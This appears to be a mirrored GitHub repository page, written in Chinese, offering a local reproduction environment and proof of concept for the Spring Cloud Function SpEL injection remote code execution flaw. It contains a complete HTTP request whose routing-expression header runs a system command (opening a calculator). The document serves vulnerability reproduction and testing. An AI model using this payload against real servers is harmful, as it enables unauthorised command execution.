Giters

Pizz33 / Spring-Cloud-Function-SpEL

spring-cloud-function SpEL RCE复现环境&poc

Repository from Github https://github.comPizz33/Spring-Cloud-Function-SpELRepository from Github https://github.comPizz33/Spring-Cloud-Function-SpEL

javapocrce

Spring-Cloud-Function-SpEL

可访问个人博客查看详情 https://pizz33.github.io/
一个用于Spring Cloud Function SpEL表达式注入的测试环境
版本 java11 运行 java -jar demo-0.0.1-SNAPSHOT.jar 启动

搭建完成访问127.0.0.1:8080端口
image

POST /functionRouter HTTP/1.1
Host: 127.0.0.1:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc")
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

xxx

ed8de6718b7501e80a470a96293aa37

About

spring-cloud-function SpEL RCE复现环境&poc

javapocrce